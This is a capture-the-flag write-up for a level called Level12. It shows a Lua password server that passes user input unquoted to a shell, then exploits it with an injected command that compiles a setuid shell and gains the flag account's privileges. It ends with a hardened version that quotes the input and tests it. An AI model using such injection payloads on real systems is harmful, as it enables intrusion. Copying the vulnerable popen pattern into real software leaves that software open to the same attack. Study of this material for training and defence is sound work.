In Level12 we are given the following code:

```lua
local socket = require("socket")
local server = assert(socket.bind("", 50001))

function hash(password)
  -- Vulnerable: password is concatenated straight into a shell command line
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")

  -- keep only the 40 hex characters of the digest
  data = string.sub(data, 1, 40)

  return data
end

while 1 do
  local client = server:accept()
  client:send("Password: ")
  local line, err = client:receive()
  if not err then
    print("trying " .. line) -- log from where ;\
    local h = hash(line)

    if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
      client:send("Better luck next time\n");
    else
      client:send("Congrats, your token is 413**CARRIER LOST**\n")
    end
  end

  client:close()
end
```



This is a command injection: the password is controlled by the user and is concatenated, unquoted, into the command string that `io.popen` hands to the shell, so any shell metacharacters in it are interpreted as part of the command. All we need to do is inject our commands. In this case, we will be using the shell wrapper shown in level 11:

```
[email protected]:~$ nc localhost 50001
Password: 1; gcc -o /tmp/shell /tmp/shell.c; chmod +s /tmp/shell; echo 1
Better luck next time
[email protected]:~$ ls -la /tmp
total 32
drwxrwxrwt  4 root    root    4096 Nov 24 12:37 .
drwxr-xr-x 22 root    root    4096 Dec  6  2011 ..
-rwsr-sr-x  1 flag12  flag12  7241 Nov 24 12:43 shell
-rw-rw-r--  1 level11 level11  180 Nov 24 11:48 shell.c
```

Now let's run our shell and get the flag:

```
[email protected]:~$ cd /tmp
[email protected]:/tmp$ ./shell
sh-4.2$ id
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)
sh-4.2$ getflag
You have successfully executed getflag on a target account
```

Voila !!
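
For comparison, here is a hardened `hash()` that closes the injection described above. It is an added example, not part of the level's code: `shell_quote` is a hypothetical helper, and it assumes a POSIX `sh` behind `io.popen` and `sha1sum` on the PATH.

```lua
-- Added example, not the level's code. shell_quote is a hypothetical helper.
-- Assumes a POSIX sh behind io.popen and sha1sum on PATH.

-- Wrap s in single quotes for sh. Inside single quotes nothing is expanded;
-- only ' itself needs handling, rewritten as '\'' (close, escaped quote, reopen).
local function shell_quote(s)
  local quoted = s:gsub("'", "'\\''")
  return "'" .. quoted .. "'"
end

local function hash(password)
  -- io.popen takes a C string, so a NUL byte would truncate the command.
  if password:find("\0", 1, true) then
    return nil, "NUL byte in input"
  end
  -- printf '%s\n' keeps echo's trailing newline, so digests of simple
  -- passwords are unchanged, but never treats its argument as options.
  local cmd = "printf '%s\\n' " .. shell_quote(password) .. " | sha1sum"
  local prog = assert(io.popen(cmd, "r"))
  local data = prog:read("*a")
  prog:close()
  return string.sub(data, 1, 40)
end

-- Constructed inputs: each must be hashed as literal bytes, never executed.
local samples = { "letmein", "1; id", "$(id)", "`id`", "it's; id #", "-n x" }
for _, s in ipairs(samples) do
  local h = assert(hash(s))
  assert(#h == 40 and h:match("^%x+$"), "unexpected sha1sum output")
  print(string.format("%-12s -> %s", s, h))
end
-- Metacharacters are part of the hashed data, so these digests differ.
assert(hash("1; id") ~= hash("1"))
assert(hash("x\0y") == nil)
```

Computing the digest in-process with a SHA-1 library removes the shell from the path entirely and is the stronger fix where one is available.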